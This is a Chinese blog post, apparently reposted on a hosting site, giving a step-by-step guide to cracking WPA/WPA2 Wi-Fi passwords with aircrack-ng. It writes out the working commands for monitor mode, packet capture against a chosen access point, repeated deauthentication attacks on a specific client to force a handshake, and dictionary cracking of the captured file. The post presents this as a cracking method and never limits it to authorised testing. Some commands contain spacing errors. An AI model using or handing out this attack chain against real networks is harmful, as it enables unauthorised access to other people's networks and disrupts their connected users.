WAP/WAP2无线网络破解

发布时间:2020-07-10 07:18:40 作者:wtwb2010
来源:网络 阅读:771

声明:本文参考了网上的众多资料,加上自己的一晚上的奋斗实际操作总结

其中http://netsecurity.51cto.com/art/201105/264844_all.htm该文写的比较详细,可做参考。

 

1.查看无线网卡状态,激活无线网卡

ifconfig

ifconfig wlan0 up

 

2. 激活无线网卡至monitor即监听模式

airmon-ng start wlan0

 

3. 探测无线网络,抓取无线数据包

在正式抓包之前,一般都是先进行预来探测,来获取当前无线网络概况,包括AP的SSID、MAC地址、工作频道、无线客户端MAC及数量等。

注意:此处的客户端是指无线AP的客户端,并非破解的主机

airodump-ng mon0


 

注意:此处的BSSID为AP的mac,STATION为客户端的mac

找破解的目标是尽量选择排行靠前,且有数据(data)的AP,记下这里的AP和STATION的mac,及信道(CH)

BSSID              STATION             CH

C8:3A:35:2D:5E:78  88:E3:AB:C3:A6:0F    7

airodump-ng -c 7 –w abc--bssid C8:3A:35:2D:5E:78 mon0

#对该AP抓取数据包并写入abc文件

-c:该AP的无线信道

-w:表示要写入的文件

--bssid:AP的mac地址

 WAP/WAP2无线网络破解

 

 

 

4. 进行Deauth***加速破解过程。

上面的窗口不关,让其继续抓包,此时重开第二个窗口进行Deauth***加速破解过程。

aireplay-ng -0 1 -aC8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

运行后可能会出现如下错误

WAP/WAP2无线网络破解 

根据提示修改命令如下:

aireplay-ng--ignore-negative-one -0 1 -a C8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

WAP/WAP2无线网络破解

 

可以看到不再报错,但是标识部分为【0 |31ACKS】表示没有数据应答,因此需要重复该步骤知道这里有数据应答且第一个窗口出现握手包才行,才可以进行下一步操作,可以调高这里的***数字

aireplay-ng--ignore-negative-one -0 10-a C8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

注意:该处出现应答数据

WAP/WAP2无线网络破解

 

且刚才抓包数据的第一个窗口出现握手包,由于该出握手包一闪而过,在第二个窗口进行Deauth***需要留心观察第一个窗口(我这里是截图网上的,实际难以截图,一闪而过)

 

WAP/WAP2无线网络破解

 

5.做完上面关键的一步,接下来是激动人心的破解步骤了,WAP/WAP2均需要字典来破解,请提前下载好字典并放在破解系统上面

aircrack-ng -w beini.txt  abc*.cap

 WAP/WAP2无线网络破解

-w:接破解的密码字典

abc*.cap 为第一个窗口抓取的数据包

接下来的就是坐等结果,能不能成功看你的字典好坏,对方AP密码难度系数,电脑的破解速度,和一点点运气了


注明:不知道为什么复制不了截图上去,详情请见附件

 

 

 

 


附件:http://down.51cto.com/data/2365717
推荐阅读:
  1. 图文并茂详解服务器密码忘记了怎么办?
  2. Windows10 开机密码破解

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

破解 wap 无线网卡

上一篇:Android RecyclerView详解及实现瀑布流式布局

下一篇:IdleHandler,页面启动优化神器

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》